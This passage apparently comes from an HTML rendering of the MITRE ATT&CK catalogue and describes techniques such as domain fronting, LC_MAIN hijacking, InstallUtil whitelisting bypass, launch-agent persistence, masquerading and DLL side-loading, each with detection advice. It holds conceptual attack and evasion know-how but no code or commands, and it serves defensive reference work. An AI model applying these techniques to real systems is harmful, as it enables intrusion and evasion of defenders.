<p>The configurations for how applications run on macOS and OS X are listed in property list (plist) files. One of the tags in these files can be &lt;code&gt;apple.awt.UIElement&lt;/code&gt;, which allows for Java applications to prevent the application&#8217;s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don&#8217;t also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window (Citation: Antiquated Mac Malware).</p>
</div>
<div class="paragraph">
<p>Detection: Plist files are ASCII text files with a specific format, so they&#8217;re relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 795. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1143">https://attack.mitre.org/wiki/Technique/T1143</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/">https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_domain_fronting_t1172"><a class="anchor" href="#_domain_fronting_t1172"></a><a class="link" href="#_domain_fronting_t1172">Domain Fronting - T1172</a></h3>
<div class="paragraph">
<p>Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) The technique involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).</p>
</div>
<div class="paragraph">
<p>For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.</p>
</div>
<div class="paragraph">
<p>Detection: If SSL inspection is in place, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blacklist or whitelist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: SSL/TLS inspection</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 796. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1172">https://attack.mitre.org/wiki/Technique/T1172</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.icir.org/vern/papers/meek-PETS-2015.pdf">http://www.icir.org/vern/papers/meek-PETS-2015.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lc_main_hijacking_t1149"><a class="anchor" href="#_lc_main_hijacking_t1149"></a><a class="link" href="#_lc_main_hijacking_t1149">LC_MAIN Hijacking - T1149</a></h3>
<div class="paragraph">
<p>As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binarys entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesnt know anything was different (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.</p>
</div>
<div class="paragraph">
<p>Detection: Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Binary file metadata, Malware reverse engineering, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Application whitelisting, Process whitelisting, Whitelisting by file name or path</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 797. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1149">https://attack.mitre.org/wiki/Technique/T1149</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf">https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_installutil_t1118"><a class="anchor" href="#_installutil_t1118"></a><a class="link" href="#_installutil_t1118">InstallUtil - T1118</a></h3>
<div class="paragraph">
<p>InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;. InstallUtil.exe is digitally signed by Microsoft.</p>
</div>
<div class="paragraph">
<p>Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)</p>
</div>
<div class="paragraph">
<p>Detection: Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Process whitelisting</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<div class="paragraph">
<p>Contributors: Casey Smith, Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 798. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1118">https://attack.mitre.org/wiki/Technique/T1118</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/50614e95.aspx">https://msdn.microsoft.com/en-us/library/50614e95.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_obfuscation_t1001"><a class="anchor" href="#_data_obfuscation_t1001"></a><a class="link" href="#_data_obfuscation_t1001">Data Obfuscation - T1001</a></h3>
<div class="paragraph">
<p>Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Process use of network, Process monitoring, Network protocol analysis</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 799. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1001">https://attack.mitre.org/wiki/Technique/T1001</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shortcut_modification_t1023"><a class="anchor" href="#_shortcut_modification_t1023"></a><a class="link" href="#_shortcut_modification_t1023">Shortcut Modification - T1023</a></h3>
<div class="paragraph">
<p>Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use Masquerading to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</p>
</div>
<div class="paragraph">
<p>Detection: Since a shortcut&#8217;s target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>Contributors: Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 800. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1023">https://attack.mitre.org/wiki/Technique/T1023</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_launch_agent_t1159"><a class="anchor" href="#_launch_agent_t1159"></a><a class="link" href="#_launch_agent_t1159">Launch Agent - T1159</a></h3>
<div class="paragraph">
<p>Per Apples developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;$HOME/Library/LaunchAgents&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).</p>
</div>
<div class="paragraph">
<p>Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories (Citation: Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific users directory structure) or when any user logs in (which requires administrator privileges).</p>
</div>
<div class="paragraph">
<p>Detection: Monitor Launch Agent creation through additional plist files and utilities such as Objective-Sees KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 801. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1159">https://attack.mitre.org/wiki/Technique/T1159</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/">https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/">https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.synack.com/wp-content/uploads/2016/03/RSA%20OSX%20Malware.pdf">https://www.synack.com/wp-content/uploads/2016/03/RSA%20OSX%20Malware.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/">https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update">https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/">https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obfuscated_files_or_information_t1027"><a class="anchor" href="#_obfuscated_files_or_information_t1027"></a><a class="link" href="#_obfuscated_files_or_information_t1027">Obfuscated Files or Information - T1027</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system. This is common behavior that can be used across different platforms to evade defenses. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis)</p>
</div>
<div class="paragraph">
<p>Detection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 802. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1027">https://attack.mitre.org/wiki/Technique/T1027</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/">https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_video_capture_t1125"><a class="anchor" href="#_video_capture_t1125"></a><a class="link" href="#_video_capture_t1125">Video Capture - T1125</a></h3>
<div class="paragraph">
<p>An adversary can leverage a computer&#8217;s peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.</p>
</div>
<div class="paragraph">
<p>Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim&#8217;s screen.</p>
</div>
<div class="paragraph">
<p>Detection: Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.</p>
</div>
<div class="paragraph">
<p>Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, File monitoring, API monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 803. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1125">https://attack.mitre.org/wiki/Technique/T1125</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_masquerading_t1036"><a class="anchor" href="#_masquerading_t1036"></a><a class="link" href="#_masquerading_t1036">Masquerading - T1036</a></h3>
<div class="paragraph">
<p>Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.</p>
</div>
<div class="paragraph">
<p>One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs. This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.</p>
</div>
<div class="paragraph">
<p>===Windows===
In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</p>
</div>
<div class="paragraph">
<p>An example of abuse of trusted locations in Windows would be the &lt;code&gt;C:\Windows\System32&lt;/code&gt; directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe".</p>
</div>
<div class="paragraph">
<p>===Linux===
Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)</p>
</div>
<div class="paragraph">
<p>An example of abuse of trusted locations in Linux would be the &lt;code&gt;/bin&lt;/code&gt; directory. Examples of trusted binary names that can be given to malicious binares include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)</p>
</div>
<div class="paragraph">
<p>Detection: Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.</p>
</div>
<div class="paragraph">
<p>If file names are mismatched between the binary name on disk and the binary&#8217;s resource section, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Binary file metadata</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Whitelisting by file name or path</p>
</div>
<div class="paragraph">
<p>Contributors: ENDGAME, Bartosz Jerzman</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 804. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1036">https://attack.mitre.org/wiki/Technique/T1036</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/how-hunt-masquerade-ball">https://www.endgame.com/blog/how-hunt-masquerade-ball</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/CozyDuke">https://www.f-secure.com/documents/996508/1030745/CozyDuke</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2016/03/30/meet-remaiten-a-linux-bot-on-steroids-targeting-routers-and-potentially-other-iot-devices/">https://www.welivesecurity.com/2016/03/30/meet-remaiten-a-linux-bot-on-steroids-targeting-routers-and-potentially-other-iot-devices/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/">https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://vms.drweb.com/virus/?i=4276269">https://vms.drweb.com/virus/?i=4276269</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dll_side_loading_t1073"><a class="anchor" href="#_dll_side_loading_t1073"></a><a class="link" href="#_dll_side_loading_t1073">DLL Side-Loading - T1073</a></h3>
<div class="paragraph">
<p>Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)</p>
</div>
<div class="paragraph">
<p>Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process use of network, Process monitoring, Loaded DLLs</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, Process whitelisting</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 805. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1073">https://attack.mitre.org/wiki/Technique/T1073</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/aa375365">https://msdn.microsoft.com/en-us/library/aa375365</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_automated_exfiltration_t1020"><a class="anchor" href="#_automated_exfiltration_t1020"></a><a class="link" href="#_automated_exfiltration_t1020">Automated Exfiltration - T1020</a></h3>
<div class="paragraph">
<p>Data, such as sensitive documents, may be exfiltrated through the use of automated processing or Scripting after being gathered during Collection.</p>
</div>
<div class="paragraph">
<p>When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process use of network</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 806. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1020">https://attack.mitre.org/wiki/Technique/T1020</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_network_service_scanning_t1046"><a class="anchor" href="#_network_service_scanning_t1046"></a><a class="link" href="#_network_service_scanning_t1046">Network Service Scanning - T1046</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process use of network</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 807. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1046">https://attack.mitre.org/wiki/Technique/T1046</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_replication_through_removable_media_t1091"><a class="anchor" href="#_replication_through_removable_media_t1091"></a><a class="link" href="#_replication_through_removable_media_t1091">Replication Through Removable Media - T1091</a></h3>
<div class="paragraph">
<p>Adversaries may move to additional systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into another system and executes. This may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Data loss prevention</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>System Requirements: Removable media allowed, Autorun enabled or vulnerability present that allows for code execution</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 808. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
